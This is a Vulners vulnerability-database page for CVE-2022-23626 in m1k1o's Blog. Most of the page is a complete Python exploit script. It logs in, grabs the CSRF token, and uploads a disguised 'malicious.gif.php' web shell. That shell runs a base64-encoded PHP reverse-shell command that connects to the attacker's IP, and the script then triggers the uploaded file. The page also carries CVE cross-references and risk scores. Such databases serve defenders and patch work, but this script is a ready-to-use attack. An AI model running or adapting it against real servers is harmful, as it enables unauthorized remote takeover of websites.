Vulners
Lucene search
m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | m1k1o Blog v.10 - Remote Code Execution Exploit | 24 May 202200:00 | – | zdt |
 | CVE-2022-23626 | 9 Feb 202200:15 | – | circl |
 | M1k1o Blog 输入验证错误漏洞 | 8 Feb 202200:00 | – | cnnvd |
 | CVE-2022-23626 | 8 Feb 202222:00 | – | cve |
 | CVE-2022-23626 Insufficient file checks in m1k1o/blog | 8 Feb 202222:00 | – | cvelist |
 | EUVD-2022-28584 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-23626 | 8 Feb 202222:15 | – | nvd |
 | CVE-2022-23626 Insufficient file checks in m1k1o/blog | 8 Feb 202222:00 | – | osv |
 | m1k1o's Blog 1.3 Remote Code Execution | 23 May 202200:00 | – | packetstorm |
 | Design/Logic Flaw | 8 Feb 202222:15 | – | prion |
10
# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626
import argparse
import json
import re
from base64 import b64encode
import requests as req
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
args = vars(parser.parse_args())
username = args['username']
password = args['password']
lhost_ip = args['ip']
lhost_port = args['lport']
address = args['url']
port = args['port']
url = f"http://{address}:{port}"
blog_cookie = ""
csrf_token = ""
exploit_file_name = ""
header = {
"Host": f"{address}",
"Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
def get_cookie(complete_url):
global blog_cookie
cookie_header = {}
if not blog_cookie:
cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
result = req.get(url=complete_url, headers=cookie_header)
if result.status_code == 200:
blog_cookie = result.cookies.get_dict()['PHPSESSID']
print(f'[+] Found PHPSESSID: {blog_cookie}')
grep_csrf(result)
def grep_csrf(result):
global csrf_token
csrf_regex = r"[a-f0-9]{10}"
soup = BeautifulSoup(result.text, 'html.parser')
script_tag = str(soup.findAll('script')[1].contents[0])
csrf_token = re.search(csrf_regex, script_tag).group(0)
print(f'[+] Found CSRF-Token: {csrf_token}')
def login(username, password):
get_cookie(url)
login_url = f"{url}/ajax.php"
login_data = f"action=login&nick={username}&pass={password}"
login_header = {
"Host": f"{address}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
result = req.post(url=login_url, headers=login_header, data=login_data)
soup = BeautifulSoup(result.text, 'html.parser')
login_content = json.loads(soup.text)
if login_content.get('logged_in'):
print('[*] Successful login')
else:
print('[!] Bad login')
def set_cookie(result):
global blog_cookie
blog_cookie = result.cookies.get_dict()['PHPSESSID']
def generate_payload(command):
return f"""
-----------------------------13148889121752486353560141292
Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
Content-Type: application/x-httpd-php
GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;
-----------------------------13148889121752486353560141292--
"""
def send_payload():
payload_header = {
"Host": f"{address}",
"Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
payload = generate_payload(command)
print(f"[+] Upload exploit")
result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
set_exploit_file_name(result.content.decode('ascii'))
def set_exploit_file_name(data):
global exploit_file_name
file_regex = r"[a-zA-Z0-9]{4,5}.php"
exploit_file_name = re.search(file_regex, data).group(0)
def call_malicious_php(file_name):
global header
complete_url = f"{url}/data/i/{file_name}"
print('[*] Calling reverse shell')
result = req.get(url=complete_url)
def check_reverse_shell():
yes = {'yes', 'y', 'ye', ''}
no = {'no', 'n'}
choice = input("Have you got an active netcat listener (y/Y or n/N): ")
if choice in yes:
return True
elif choice in no:
print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
return False
def main():
enabled_listener = check_reverse_shell()
if enabled_listener:
login(username, password)
send_payload()
call_malicious_php(exploit_file_name)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 May 2022 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 26.5
CVSS 3.18.5 - 8.8
EPSS0.04273
SSVC